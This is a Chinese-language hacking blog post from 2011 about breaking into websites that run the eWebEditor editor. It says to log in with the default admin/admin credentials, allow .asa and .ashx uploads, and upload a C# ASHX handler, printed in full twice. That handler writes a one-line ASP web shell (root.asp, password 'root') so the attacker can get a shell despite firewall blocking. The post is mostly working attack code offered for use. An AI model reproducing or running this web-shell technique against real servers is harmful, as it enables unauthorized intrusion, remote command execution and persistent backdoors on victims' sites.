ewebeditor 上传遇到防火墙限制的解决办法 图文
45人参与 • 2011-05-10 • 脚本攻防
这是一个eweb入口(废话)
<%@ webhandler language="c#" class="handler" %>
using system;
using system.web;
using system.io;
public class handler : ihttphandler {
public void processrequest (httpcontext context) {
context.response.contenttype = "text/plain";
streamwriter file1= file.createtext(context.server.mappath("root.asp"));
file1.write("<%response.clear:execute request(\"root\"):response.end%>");
file1.flush();
file1.close();
}
public bool isreusable {
get {return false; }
}
}
然后直接访问它。。
用默认帐户密码admin admin进入
样式添加asa扩展名
直接上传asp马
到这里都是顺利的,但是。。当你访问马的时候。。
试过了小马,一句话,会出现同样的问题
解决方法:
在样式添加里加上扩展名ashx
创建一个1.ashx的文件, 上传,代码如下:
复制代码
代码如下:<%@ webhandler language="c#" class="handler" %>
using system;
using system.web;
using system.io;
public class handler : ihttphandler {
public void processrequest (httpcontext context) {
context.response.contenttype = "text/plain";
streamwriter file1= file.createtext(context.server.mappath("root.asp"));
file1.write("<%response.clear:execute request(\"root\"):response.end%>");
file1.flush();
file1.close();
}
public bool isreusable {
get {return false; }
}
}
它会在当前目录生成一个root.asp的一句话木马,密码为root
然后连接一句话木马就可以啦~~
拿到shell
赞 (0)
打赏
微信扫一扫
微信扫一扫
您想发表意见!!点此发布评论
发表评论